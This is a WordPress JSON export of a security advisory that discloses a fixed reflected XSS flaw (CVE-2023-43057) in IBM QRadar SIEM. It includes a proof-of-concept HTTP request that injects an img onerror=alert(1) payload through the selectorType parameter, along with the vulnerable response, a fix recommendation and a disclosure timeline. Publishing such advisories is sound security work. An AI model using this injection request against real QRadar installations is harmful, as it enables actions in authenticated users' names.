{"id":21540,"date":"2023-12-11T10:02:36","date_gmt":"2023-12-11T09:02:36","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=21540"},"modified":"2023-12-13T09:07:56","modified_gmt":"2023-12-13T08:07:56","slug":"usd-2023-0032","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2023-0032\/","title":{"rendered":"usd-2023-0032"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.23.1\" _module_preset=\"default\" custom_padding=\"||13px|||\" global_colors_info=\"{}\"]<\/p>\n

usd-2023-0032 | Reflected XSS in IBM QRadar SIEM 7.5.0 UpdatePackage 5<\/h1>\n

<\/h1>\n

Advisory ID<\/strong>: usd-2023-0032
Product<\/strong>: IBM QRadar SIEM
Affected Version<\/strong>: IBM QRadar SIEM 7.5.0 UpdatePackage 5 (Build 20230301133107)
Vulnerability Type<\/strong>: CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Security Risk<\/strong>: Medium
Vendor URL<\/strong>: https:\/\/www.usd.de\/<\/a>
Vendor acknowledged vulnerability<\/strong>: Yes
Vendor Status<\/strong>: Fixed
CVE number<\/strong>: CVE-2023-43057
CVE Link<\/strong>: https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2023-43057<\/a><\/p>\n

Desciption<\/h3>\n

IBM QRadar SIEM is a security information and event management platform developed by IBM that provides advanced threat detection for its users.<\/p>\n

The web interface of the platform is vulnerable to a reflected cross-site scripting attack.
The GET parameter selectorType<\/strong> is not properly encoded by the application, allowing attackers to inject arbitrary JavaScript code into the resulting web page.<\/p>\n

Attackers could generate links containing malicious JavaScript code and send them to users who are authenticated to the application.
When the link is opened, the malicious JavaScript code is executed in the user's browser.
This vulnerability could be exploited by attackers in a number of ways. For example, they could perform arbitrary actions within the application in the user's name, or redirect the user to other locations.<\/p>\n

Proof of Concept<\/h3>\n

In the following, the HTML tag \">&ltimg onerror=\"alert(1)\" src=\"a\"\/><\/strong> has been inserted into the HTTP GET selectorType<\/strong> parameter and sent to the application.<\/p>\n

GET \/console\/do\/qradar\/arielProperties?id=&hasLinkedExpression=false&database=events&submitTestPayload=&destPayload=&sourcePayload=&selectorType=regex%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3e&dispatch=save&prevAction=&newProperty=true&newPropertyName=&__checkbox_forceparse=true&propertyDescription=&enabled=true&__checkbox_enabled=true&deviceTypeId=4009&deviceid=-1&parsedOn=false&qid=1004000002&expressionTypeValue=REGEX&regex=SAP&captureGroup=1&delimiter=&delimiterPair=&aqlExpression=&property1=&property1UD=&operator=%2B&property2=&property2UD=&languagetag=en-US&dateTimePattern=&patternSelect=M&languagetag=en-US HTTP\/1.1\nHost: [...]\nCookie: JSESSIONID=[...]\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/114.0.5735.110 Safari\/537.36\nConnection: close\n<\/pre>\n
The application will then return the following response:<\/p>\n
HTTP\/1.1 200\nServer: QRadar\n[...]\n\n<?xml version=\"1.0\" encoding=\"UTF-8\">\n[...]\n        <\/div>\n        <input type=\"hidden\" name=\"id\" value=\"\" id=\"qradar_arielProperties_id\"\/>\n        <input type=\"hidden\" name=\"hasLinkedExpression\" value=\"false\" id=\"qradar_arielProperties_hasLinkedExpression\"\/>\n        <input type=\"hidden\" name=\"database\" value=\"events\" id=\"qradar_arielProperties_database\"\/>\n        <input type=\"hidden\" name=\"submitTestPayload\" value=\"\" id=\"testPayload\"\/>\n        <input type=\"hidden\" name=\"destPayload\" value=\"\" id=\"destPayload\"\/>\n        <input type=\"hidden\" name=\"sourcePayload\" value=\"\" id=\"sourcePayload\"\/>\n        <input type=\"hidden\" name=\"selectorType\" id=\"calculated\" value=\"regex\\\"><img src=a onerror=alert(1)>\"\/>\n        <input type=\"hidden\" name=\"dispatch\" value=\"save\" \/>\n        <input type=\"hidden\" name=\"prevAction\" value=\"\" \/>\n[...]\n<\/pre>\n
Line 15 of the response shows that the HTML tag is inserted into the web page and the JavaScript alert(1)<\/strong> is executed.<\/p>\n
Fix<\/h3>\n
It is recommended that any user input that is output back into a web page be coded according to the output context.<\/p>\n
References<\/h3>\n
https:\/\/owasp.org\/www-community\/attacks\/xss\/<\/a>
https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2023-43057<\/a>
https:\/\/www.ibm.com\/support\/pages\/node\/7070736<\/a><\/p>\n
Timeline<\/h3>\n
    \n
  • 2023-09-28<\/strong>: First contact request via hackerone.com.<\/li>\n
  • 2023-11-16<\/strong>: IBM notifies us of a fix for the reported vulnerability, now referred to as CVE-2023-43057.<\/li>\n
  • 2023-11-20<\/strong>: Security Advisory published by usd AG.<\/li>\n<\/ul>\n
    Credits<\/h3>\n
    This security vulnerability was identified by Gerbert Roitburd and Dominik Baucke of usd AG.<\/p>\n
    [\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"
    usd-2023-0032 | Reflected XSS in IBM QRadar SIEM 7.5.0 UpdatePackage 5 Advisory ID: usd-2023-0032Product: IBM QRadar SIEMAffected Version: IBM QRadar SIEM 7.5.0 UpdatePackage 5 (Build 20230301133107)Vulnerability Type: CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')Security Risk: MediumVendor URL: https:\/\/www.usd.de\/Vendor acknowledged vulnerability: YesVendor Status: FixedCVE number: CVE-2023-43057CVE Link: https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2023-43057 Desciption IBM QRadar […]<\/p>\n","protected":false},"author":114,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-21540","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/21540","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/114"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=21540"}],"version-history":[{"count":5,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/21540\/revisions"}],"predecessor-version":[{"id":21560,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/21540\/revisions\/21560"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=21540"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}